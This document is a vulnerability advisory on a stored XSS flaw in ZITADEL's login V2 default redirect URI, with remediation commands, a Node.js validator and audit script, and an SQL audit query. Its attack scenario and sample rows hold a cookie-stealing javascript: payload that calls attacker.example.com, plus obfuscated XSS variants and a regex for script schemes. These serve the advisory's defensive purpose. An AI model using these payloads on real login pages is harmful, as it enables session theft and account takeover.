ZITADEL Stored XSS in Default Redirect URI Targets All Logged-In Users
ZITADEL, an open-source identity management and SSO platform, has disclosed CVE-2026-29192, a stored cross-site scripting (XSS) vulnerability that allows a malicious organization administrator to inject persistent JavaScript into the login V2 interface. Any user who authenticates through the affected organization after the payload is planted will have the script execute in their browser, enabling token theft and full account takeover.
The vulnerability has a CVSS score of 7.7 and affects ZITADEL versions 4.0.0 through 4.11.1. The patch is included in version 4.12.0, released March 7, 2026.
Vulnerability Details
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-29192 |
| CVSS Score | 7.7 (High) |
| CVSS Vector | AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N |
| CWE | CWE-79: Cross-Site Scripting |
| Attack Type | Stored XSS via Default Redirect URI configuration |
| Authentication Required | Yes — organization administrator role |
| User Interaction | None (victims are affected on normal login) |
| Affected Versions | ZITADEL 4.0.0 – 4.11.1 |
| Patched Version | ZITADEL 4.12.0 |
| Disclosure Date | March 7, 2026 |
How the Attack Works
Root Cause
ZITADEL's login V2 interface allows organization administrators to configure a default redirect URI — a URL to which users are sent after successful authentication if no application-specific redirect is provided. This value is stored in the database and rendered in the login UI on subsequent user visits.
The vulnerability lies in insufficient validation of the default redirect URI before it is rendered in the DOM. An administrator who can set this value can store a JavaScript URI (javascript:...) or an HTML event handler in place of an https:// URL; the login V2 UI then emits the stored value as-is, so it executes in every user's browser when they log in. A check on this field has to be allowlist-based (accept only absolute http(s) URLs) rather than a denylist of known-bad prefixes, because browsers tolerate mixed case, leading whitespace and embedded tabs or newlines inside a scheme and still treat the result as javascript:.
Attack Scenario
1. Attacker compromises or is a malicious organization administrator
2. Attacker sets the default redirect URI to a JavaScript payload:
javascript:fetch('https://attacker.example.com/steal?c='+document.cookie)
3. The malicious value is stored in ZITADEL's database
4. Every subsequent user who logs in through this ZITADEL organization:
— The login V2 UI renders the stored URI without sanitization
— JavaScript executes automatically in the user's browser
— Session cookies, OIDC tokens, or other browser data are exfiltrated
5. Attacker uses harvested tokens to impersonate victims
Why This Matters Despite Requiring Admin Access
Although exploiting this vulnerability requires organization administrator privileges, the threat model remains significant:
- Compromised admin credentials — A separate breach (phishing, credential stuffing, or another ZITADEL vulnerability) could give an attacker admin access, which they then leverage to implant this stored XSS for persistent, broad account harvesting
- Malicious insider — An administrator with malicious intent can silently plant the payload and harvest tokens from all users without visible disruption
- Chained exploitation — Combined with other ZITADEL vulnerabilities disclosed on the same date (CVE-2026-29193, which allows unauthorized self-registration with elevated policies), an attacker may escalate to admin before planting this payload
- Scope escalation — Because ZITADEL is an identity provider, XSS within its origin can steal tokens valid for all downstream applications — the blast radius extends far beyond ZITADEL itself
Affected Versions
| ZITADEL Version | Status | Action |
|---|---|---|
| 4.0.0 – 4.11.1 | Vulnerable | Upgrade to 4.12.0 |
| 4.12.0+ | Patched | No action required |
| < 4.0.0 | Not affected | Login V2 not present |
Remediation
Upgrade to ZITADEL 4.12.0
ZITADEL 4.12.0 applies strict validation and sanitization to the default redirect URI field, blocking javascript: URIs and other dangerous schemes from being stored or rendered.
# Docker: pull the patched image, then recreate the container with the new tag
docker pull ghcr.io/zitadel/zitadel:v4.12.0
# Helm (Kubernetes): keep the existing release values and only bump the image tag
helm upgrade zitadel zitadel/zitadel \
  --reuse-values \
  --set image.tag=v4.12.0
# Verify the rollout (deployment name "zitadel" assumed; adjust to your release)
kubectl rollout status deployment/zitadel
Interim Controls
Until upgrade is possible:
- Audit the default redirect URI — Check the current value in each organization's login settings and ensure it is an https:// URL of a legitimate application, not a javascript: or data: URI and not an external domain. If a malicious value is found, treat every session established since the value was changed as compromised and revoke it.
- Restrict administrator access — Apply least-privilege principles; limit who can modify organization-level login settings
- Review administrator audit logs — Look for recent changes to the redirect URI configuration and for the account that made them
- Enable MFA for all accounts — MFA does not stop reuse of a session or OIDC token already stolen via XSS, but it raises the bar for the precondition (obtaining an administrator account) and for re-authentication once stolen tokens expire
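As an added example that is not part of the original advisory and not ZITADEL's own code, the following Node.js script shows the allowlist validation the root cause section calls for (a denylist prefix check placed next to a WHATWG-URL-based check, so the bypasses the former misses are visible) together with an audit pass of the kind the first interim control describes, run over constructed rows. The host allowlist, the column names org_id and default_redirect_uri, and the sample rows are assumptions made for the example.

```javascript
// Added example (not ZITADEL's code): allowlist validation for a stored default
// redirect URI, and an audit pass over values already in the database.
// Assumptions: ALLOWED_HOSTS and SAMPLE_ROWS are constructed for this example;
// the column names org_id / default_redirect_uri are illustrative.
// Uses the global WHATWG URL class available in Node.js (no imports needed).

const ALLOWED_SCHEMES = new Set(["https:", "http:"]);

// Denylist check of the kind that is bypassable: it only inspects the literal
// prefix, so leading whitespace or a tab inside "javascript" slips through.
function naiveIsSafe(raw) {
  return !raw.toLowerCase().startsWith("javascript:");
}

// Hardened check. The WHATWG parser strips leading C0 controls and spaces,
// drops embedded tabs/newlines and lower-cases the scheme, the same way a
// browser will when it later navigates, so scheme tricks collapse to
// "javascript:". Only absolute http(s) URLs without credentials and
// (optionally) with an allowlisted hostname are accepted.
function validateRedirectUri(raw, allowedHosts) {
  if (typeof raw !== "string" || raw.trim() === "") {
    return { ok: false, reason: "empty" };
  }
  let url;
  try {
    url = new URL(raw); // no base URL: relative or scheme-less input throws
  } catch {
    return { ok: false, reason: "not an absolute URL" };
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };
  }
  if (url.username !== "" || url.password !== "") {
    return { ok: false, reason: "credentials in URL" };
  }
  if (allowedHosts && !allowedHosts.has(url.hostname)) {
    return { ok: false, reason: `host ${url.hostname} not in allowlist` };
  }
  return { ok: true, normalized: url.href };
}

// Audit pass over rows as they might be exported from the login-policy
// projection. Unset values are fine (no default redirect configured);
// everything else must pass validateRedirectUri. One finding per failing row.
function auditRedirectUris(rows, allowedHosts) {
  const findings = [];
  for (const row of rows) {
    const value = row.default_redirect_uri;
    if (value === null || value === undefined) continue;
    const result = validateRedirectUri(value, allowedHosts);
    if (!result.ok) {
      findings.push({ org_id: row.org_id, value, reason: result.reason });
    }
  }
  return findings;
}

// Constructed sample data: one clean row, the payload from the attack scenario,
// three obfuscated variants, two non-XSS misconfigurations and one unset value.
const ALLOWED_HOSTS = new Set(["app.example.com"]);
const SAMPLE_ROWS = [
  { org_id: "org-a", default_redirect_uri: "https://app.example.com/callback" },
  { org_id: "org-b", default_redirect_uri: "javascript:fetch('https://attacker.example.com/steal?c='+document.cookie)" },
  { org_id: "org-c", default_redirect_uri: " JavaScript:alert(document.domain)" },
  { org_id: "org-d", default_redirect_uri: "java\tscript:alert(1)" },
  { org_id: "org-e", default_redirect_uri: "data:text/html,<script>alert(1)</script>" },
  { org_id: "org-f", default_redirect_uri: "https://app.example.com@evil.example/cb" },
  { org_id: "org-g", default_redirect_uri: "https://evil.example/cb" },
  { org_id: "org-h", default_redirect_uri: null },
];

function runAudit() {
  return auditRedirectUris(SAMPLE_ROWS, ALLOWED_HOSTS);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of runAudit()) {
    console.log(`${f.org_id}: ${f.reason} -> ${JSON.stringify(f.value)}`);
  }
}
```

Point auditRedirectUris at rows exported from your own database. A finding with a javascript: or data: scheme is evidence that the field has been tampered with and should trigger session revocation; the credential and host findings are misconfigurations worth fixing regardless. Note that naiveIsSafe accepts both the leading-space and the embedded-tab variants, which is why the validation has to go through a real URL parser.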
Audit Query
Check for suspicious redirect URI values in your ZITADEL database:
-- PostgreSQL. Table and column names below are illustrative: confirm them
-- against the login-policy projection in your deployment before running.
SELECT org_id, redirect_uri, change_date
FROM default_login_policy
WHERE redirect_uri IS NOT NULL
  AND redirect_uri <> ''
  -- allowlist check: anything that is not an https:// URL deserves a look.
  -- A regex rather than LIKE, so leading whitespace and mixed case are caught.
  AND redirect_uri !~* '^\s*https://';
-- To prioritise, match the obvious script schemes first:
--   redirect_uri ~* '^\s*(javascript|data|vbscript)\s*:'
-- A scheme can also hide embedded tabs or newlines, which browsers strip,
-- so inspect every flagged value by eye rather than extending the pattern list.
Broader ZITADEL Security Context
CVE-2026-29192 is part of a batch of four ZITADEL vulnerabilities disclosed on March 7, 2026, all affecting the login V2 interface:
| CVE | CVSS | Type | Attacker Precondition |
|---|---|---|---|
| CVE-2026-29191 | 9.3 Critical | XSS via /saml-post | Unauthenticated |
| CVE-2026-29067 | 8.1 High | Password reset header injection | Unauthenticated |
| CVE-2026-29192 | 7.7 High | Stored XSS via default redirect URI | Org Admin |
| CVE-2026-29193 | TBD | Policy bypass / unauthorized self-registration | Unauthenticated |
The simultaneous disclosure of multiple login V2 vulnerabilities points to a focused review of that code path. Organizations running ZITADEL should prioritize the 4.12.0 upgrade, which addresses all four CVEs in a single release.